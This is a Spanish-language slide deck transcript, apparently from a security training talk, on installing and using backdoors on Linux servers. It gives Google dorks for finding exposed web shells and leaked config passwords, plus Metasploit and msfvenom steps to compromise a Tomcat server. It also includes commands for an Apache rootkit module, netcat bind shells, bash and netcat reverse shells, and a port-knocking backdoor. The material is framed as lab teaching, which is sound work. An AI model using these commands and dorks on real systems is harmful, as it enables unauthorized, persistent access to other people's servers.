backdoors en sistemas operativos - | blog de omar · google dorks para buscar backdoors...

Post on 28-Apr-2018

248 Views

Category:

Documents

2 Downloads

Preview:

Click to see full reader

TRANSCRIPT

Backdoors en Sistemas Operativos

Instalación, configuración y uso de Backdoors

AGENDA1. ¿Quién soy?

2. Casos de Seguridad Informática en el Perú y el

mundo

3. Buscando vulnerabilidades backdoors

4. ¿Qué es un backdoor?

1. Backdoor SETUID

2. Backdoor Módulo de APACHE

3. Backdoor Bind Shell

4. Backdoor Reverse Shell

5. Backdoor KnockOut

5. Instalando y configurando backdoors (ejemplos)

6. Información sobre el curso

7. Conclusiones

AGENDA

1. ¿Quién soy?

2. Casos de Seguridad Informática en el Perú y el

mundo

3. Buscando vulnerabilidades

4. ¿Qué es un backdoor?

5. Instalando y configurando backdoors

(ejemplos)

6. Conclusiones

#whoami• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,

C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002

• Instructor Oficial de MILE2

• Consultor de Kunak Consulting SAC

http://www.kunak.com.pe

• Psicólogo que aun no comienza sus estudios….

• Escritor en mis tiempos libres:

http://www.el-palomo.com

• Correo electrónico:

• omarc320@gmail.com

• opalomino@kunak.com.pe

• Cuenta de Facebook:

• www.facebook.com/El.Palomo.Seguridad.Informacion

AGENDA

1. ¿Quién soy?

2. Casos de Seguridad Informática en el Perú y el

mundo

3. Buscando vulnerabilidades

4. ¿Qué es un backdoor?

5. Instalando y configurando backdoors

(ejemplos)

6. Conclusiones

¿Quiénes nos

amenazan?

Y esto….¿en realidad pasa?

Y esto….¿en realidad pasa?

Hacktivistas – 54%

Hackers Independientes – 68%

Colaboradores Internos – 90%

Fuente E&Y Encuesta Global de Seguridad de Inf.

2014

Contratistas o proveedores–

66%

DEMANDA y OFERTA de Hacking en el Perú

Una fuerte OFERTA

Una fuerte OFERTA

Y una más fuerte DEMANDA

Y una más fuerte DEMANDA

Y una más fuerte DEMANDA

Y una más fuerte DEMANDA

Y una más fuerte DEMANDA

Y una más fuerte DEMANDA

Google Dorks para buscar backdoors

site:pastebin.com intext:@gmail.com | @yahoo.com |

@hotmail.com daterange:2457388-2457491

"Password=" inurl:web.config -intext:web.config ext:config

intitle:!C99Shell v. 1.0 site:.pe

filetype:php intext:"!C99Shell v. 1.0 beta“

Las personas siempre son los mejores backdoors

AGENDA

1. ¿Quién soy?

2. Casos de Seguridad Informática en el Perú y el

mundo

3. ¿Qué es un backdoor?

4. Instalando y configurando backdoors

(ejemplos)

5. Conclusiones

¿Qué es un Backdoor (puerta trasera)?

• Los backdoors son programasutilizados por los hackers para lograracceso a sistemas operativos demanera rápida y sencilla.

• Existen diferentes tipos debackdoors:

• Backdoors en Aplicaciones Web

• Backdoors a través de SETUID

• Backdoors en Módulos deServicios

• Backdoors del tipo Knocking

AGENDA

1. ¿Quién soy?

2. Casos de Seguridad Informática en el Perú y el

mundo

3. ¿Qué es un backdoor?

4. Instalando y configurando backdoors

(ejemplos)

5. Conclusiones

Arquitectura de los Ejemplos

TARGET

- Servidor TOMCAT vulnerable

- Aquí se instalaran los backdoors

- Sistema Operativo Linux

ATACANTE

- Computador desde el cual se

realizarán los ataques

- Sistema Operativo KALI LINUX 2

ATACANTE 2

- Computador desde el cual se

explotaran los backdoors

- Sistema Operativo Linux

Dirección IP: 192.168.4.131

Dirección IP: 192.168.4.130

Dirección IP: 192.168.4.132

Identificar Servicios TOMCAT

• Buscamos TOMCAT en la RED LANa través de NMAP

Nmap –sV –p 8080 –sS TARGET

auxiliary/scanner/portscan/syn

Buscamos TOMCAT/AXIS2 enINTERNET:

Google Dork:

intitle:"Tomcat Server Administration“

intitle:"Axis2 Happiness Page" +ext:jsp

Ahora si …. Vamos con los ejemplos

Identificar Vulnerabilidades en TOMCAT

• Vamos a utilizar METASPLOIT para identificarvulnerabilidades:

Root> msfconsole

Root> search tomcat

Root> use auxiliary/scanner/http/tomcat_mgr_login

Root> show options

Root> set RHOSTS 192.168.4.130

Finalmente realizar la carga de un .WAR maliciosopara obtener acceso al sistema operativo.

msfvenom -p java/meterpreter/reverse_tcpLHOST=192.168.4.131 -f war > meterpreter.war

En el cliente:

Msf> use exploit/multi/handler

Msf> set payload java/meterpreter/reverse_tcp

Backdoor con SETUID • De pronto algunos nunca escucharon de los

permisos GETUID, SETUID y STICKY. Pues estemecanismo de backdoor está asociado a SETUID.

¿Entonces en que consiste el SETUID?El SETUID es un bit que permite a las aplicacionesejecutarse con los permisos de su propietario. Elconcepto puede sonar muy abstracto pero si ponemosun ejemplo es más facil entender, vamos a crear unarchivo llamado TEST.C y lo compilamos.

Backdoor con SETUID

Backdoor en Apache Server

• Cargamos un módulo en APACHE de talmanera que no se realicen cambios a nivelde código en los aplicativos PHP.

• ¿Cuántos administradores de Sistemasverifican los módulos cargados enApache?

• Toca compilar un módulo de APACHEllamado ModROOTme.

https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4

Backdoor en Apache Server

• Comandos en el Sistema Operativo

root>cd mod_rootme-0.4/

root>Make Linux

root> cp mod_rootme2.so /etc/httpd/modules

root> /etc/init.d/httpd reload

En el cliente:

Root> nc 192.168.4.130 80

GET root

Backdoor: BindShell

• Las primeras herramientas utilizadospor Hackers fue la navaja suiza“NETCAT”.

• Una BindShell es un programacorriendo una SHELL dentro de unproceso de red.

• Una BindShell puede estar escrita encualquier lenguaje de programación.

http://netcat.sourceforge.net/download.php

Backdoor: Bind Shell

• Comandos en el sistema operativo:root>./configure --enable-DGAPING_SECURITY_HOLE

root>Make

root> cd src/

root> ./netcat -l -p 8443 -e /bin/sh

root> bg

En el CLIENTE:

C:\>nc64.exe 192.168.75.133 8443

Backdoor: Reverse Shell

• Tiene el mismo concepto que una

Bind Shell pero realizada de manera

reversa.

• Ahora es el servidor quien se

conecta a nuestro cliente. Esta

pensado para poder realizar

bypass de Firewalls.

Backdoor: Reverse Shell

• Reverse Shell con BASH

En el cliente:

nc64.exe -l -p 8080 -vvv

En el servidor:bash -i >& /dev/tcp/192.168.1.34/8080 0>&1

Backdoor: Reverse Shell

• Reverse Shell con NETCAT

En el cliente:

nc64.exe -l -p 8080 -vvv

En el servidor:./netcat -e /bin/sh 192.168.1.34 8080

Backdoor: KnockOut

• Knock viene del ingles tocar lapuerta.

• Este es un backdoor del tipo“Reverse Shell” que pasadesapercibido.

• Sólo puede ser accedido poraquel que conozca lacombinación de la “puerta”correcta.

Backdoor: KnockOut

• En el servidor:• Root> $make servidor

• Root> ./knock-outd knock-out.conf eth5

• En el cliente (atacante):• Root> $make cliente

• Root> ./knock-outc 192.168.4.130 knock-out.conf

• Root> ./netcat -lv -p 64876

AGENDA

1. ¿Quién soy?

2. Casos de Seguridad Informática en el Perú y el

mundo

3. ¿Qué es un backdoor?

4. Instalando y configurando backdoors

(ejemplos)

5. Información sobre el curso

6. Conclusiones

Conclusiones:

- Instalar backdoors es la manera mas sencilla

de acceder a servidor comprometidos.

- Cuando un servidor Linux es “comprometido”

se recomienda reestablecer un backup ya que

detectar backdoors o rootkits es muy

complicado.

¿PREGUNTAS?

top related